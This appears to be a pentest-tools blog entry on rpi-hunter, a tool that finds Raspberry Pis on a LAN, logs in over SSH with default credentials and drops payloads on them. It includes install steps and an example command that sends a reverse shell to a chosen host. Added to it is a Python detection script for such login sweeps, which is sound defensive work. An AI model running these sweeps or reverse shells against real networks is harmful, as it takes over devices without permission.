Rpi-Hunter – Automate Discovering And Dropping Payloads On LAN Raspberry Pi’s Via SSH

Automate discovering and dropping payloads on LAN Raspberry Pis via SSH.

rpi-hunter is useful when there are multiple Raspberry Pis on your LAN with default or known credentials, in order to automate sending commands/payloads to them.

GUIDE:

Installation

Install dependencies: sudo pip install -U argparse termcolor and sudo apt -y install arp-scan tshark sshpass
Download rpi-hunter: git clone https://github.com/BusesCanFly/rpi-hunter
Navigate to rpi-hunter: cd ./rpi-hunter
Make rpi-hunter.py executable: chmod +x rpi-hunter.py
One line variant: sudo pip install -U argparse termcolor && sudo apt -y install arp-scan tshark sshpass && git clone https://github.com/BusesCanFly/rpi-hunter && cd ./rpi-hunter && chmod +x rpi-hunter.py

Usage

usage: rpi-hunter.py [-h] [--list] [--no-scan] [-r IP_RANGE] [-f IP_LIST] [-c CREDS] [--payload PAYLOAD] [-H HOST] [-P PORT] [--safe] [-q]

optional arguments:
  -h, --help         show this help message and exit
  --list             List available payloads
  --no-scan          Disable ARP scanning
  -r IP_RANGE        IP range to scan
  -f IP_LIST         IP list to use (Default ./scan/RPI_list)
  -u UNAME           Username to use when ssh'ing
  -c CREDS           Password to use when ssh'ing
  --payload PAYLOAD  (Name of, or raw) Payload [ex. reverse_shell or 'whoami']
  -H HOST            (If using reverse_shell payload) Host for reverse shell
  -P PORT            (If using reverse_shell payload) Port for reverse shell
  --safe             Print sshpass command, but don't execute it
  -q                 Don't print banner

Example usage: ./rpi-hunter.py -r 192.168.0.0/16 --payload reverse_shell -H 127.0.0.1 -P 1337

Run ./rpi-hunter.py --list to see available payloads.

Payloads can be specified by the payload name from --list or as raw input, e.g. --payload reverse_shell or --payload [your cli command here]
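On the defensive side, a sweep like the one described above shows up in sshd logs as one source address completing password logins on several Pis within seconds. The following is an added detection example, not part of rpi-hunter; it assumes traditional syslog-format sshd lines collected from all Pis into one file, and the function names, the year, the 3-host threshold and the 5-minute window are illustrative choices.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: hostnames, addresses and timestamps are made up.
SAMPLE_LOG = """\
Mar  3 10:15:01 pi-kitchen sshd[811]: Accepted password for pi from 192.168.0.50 port 40112 ssh2
Mar  3 10:15:03 pi-garage sshd[790]: Accepted password for pi from 192.168.0.50 port 40118 ssh2
Mar  3 10:15:04 pi-lab sshd[1022]: Failed password for pi from 192.168.0.50 port 40120 ssh2
Mar  3 10:15:06 pi-attic sshd[655]: Accepted password for pi from 192.168.0.50 port 40125 ssh2
Mar  3 11:40:12 pi-kitchen sshd[930]: Accepted publickey for admin from 192.168.0.7 port 52210 ssh2
Mar  3 14:02:44 pi-garage sshd[960]: Accepted password for pi from 192.168.0.7 port 52301 ssh2
"""

# Only successful *password* logins matter: key-based logins are not what sshpass produces.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s(?P<host>\S+)\ssshd\[\d+\]:\s"
    r"Accepted password for (?P<user>\S+) from (?P<src>\S+) port \d+"
)

def parse(log_text, year=2024):
    """Yield (timestamp, target_host, user, source_ip) per accepted password login."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["host"], m["user"], m["src"]

def find_sweeps(events, min_hosts=3, window=timedelta(minutes=5)):
    """Flag (source, user) pairs that logged in to >= min_hosts distinct hosts within window."""
    by_key = defaultdict(list)
    for ts, host, user, src in events:
        by_key[(src, user)].append((ts, host))
    alerts = []
    for (src, user), hits in by_key.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:  # slide the window forward
                start += 1
            hosts = {h for _, h in hits[start:end + 1]}
            if len(hosts) >= min_hosts:
                alerts.append({"src": src, "user": user, "hosts": sorted(hosts),
                               "first_seen": hits[start][0]})
                break  # one alert per source/user pair is enough
    return alerts

if __name__ == "__main__":
    for alert in find_sweeps(parse(SAMPLE_LOG)):
        print(alert)
```

Any host named in an alert should be treated as having run an unknown command; rotating its password and setting PasswordAuthentication no in sshd_config removes the condition the tool depends on.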

Link: http://feedproxy.google.com/~r/PentestTools/~3/cPYvAMXfbJo/rpi-hunter-automate-discovering-and.html